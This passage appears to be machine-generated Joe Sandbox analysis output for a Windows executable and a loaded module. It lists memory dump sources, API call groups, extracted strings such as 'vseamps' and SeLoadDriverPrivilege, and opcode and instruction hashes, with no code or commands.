                                                    • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                    • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                    • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                    • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                    • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                    • API String ID: 3408796845-4213300970
                                                    • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                    • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                    • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                    • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                    • String ID: ampStopSingletone: logging ended
                                                    • API String ID: 2048888615-3533855269
                                                    • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                    • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                    • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                    • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                    • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                    • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                    • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastManagerOpen$FileModuleName
                                                    • String ID: /remove$/service$vseamps
                                                    • API String ID: 67513587-3839141145
                                                    • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                    • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                    • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                    • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                    • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                    • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                      • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Load$Library
                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                    • API String ID: 3981747205-232180764
                                                    • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                    • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                    • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                    • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                    • String ID:
                                                    • API String ID: 4284112124-0
                                                    • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                    • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                    • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                    • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                    • String ID: vseamps
                                                    • API String ID: 3693165506-3944098904
                                                    • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                    • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                    • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                    • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                    • API String ID: 514040917-4022980321
                                                    • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                    • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                    • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                    • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                    • String ID:
                                                    • API String ID: 2057259594-0
                                                    • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                    • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                    • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                    • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                    • String ID:
                                                    • API String ID: 3103264659-0
                                                    • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                    • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                    • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                    • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                    • Instruction ID: 097cef425e031b2cf63e4e9710d8852a71e9e99c99783e19c64c147e49a65aad
                                                    • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                    • Instruction Fuzzy Hash: EE316B7770AB8586EB61CF60E8503ED2361FB85B44F40403AEA4E43B99DF78D658C714
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 1269745586-0
                                                    • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                    • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                    • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                    • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                    • Instruction ID: 7a0aa3a64aedfe5fdd18d5de485b6e4c9fd5a0e2d53438ce7b3bfbd120847e72
                                                    • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                    • Instruction Fuzzy Hash: F6316C3B71AB8586DB61CF24E8503AE23A0FB89B54F500535EE9E43B9ADF38D155CB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                    • String ID:
                                                    • API String ID: 1445889803-0
                                                    • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                    • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                    • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                    • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                    • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                    • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                    • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                    • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContext
                                                    • String ID:
                                                    • API String ID: 2202868296-0
                                                    • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                    • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                    • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                    • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise_clrfp
                                                    • String ID:
                                                    • API String ID: 15204871-0
                                                    • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                    • Instruction ID: c66764f6263f35c6a3b7e0fdb531f2641308f8258d3620ff50d65addd93e9296
                                                    • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                    • Instruction Fuzzy Hash: C4B14877601B898BEB16CF29C89636C3BE0F745F48F148926DA5D837A5CB39D862C704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 203985260-0
                                                    • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                    • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                    • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                    • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                    • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                    • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                    • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                    • Instruction ID: c02958a75eb18f2719bf1c8b23a7730fcf958ab4ee8887cee809f16585b8f490
                                                    • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                    • Instruction Fuzzy Hash: B351DF37B096C585FB21DF72E8502AA7BA1AB42B94F144135EE5C27B9ADE3CD001C708
                                                    APIs
                                                    Memory Dump Source
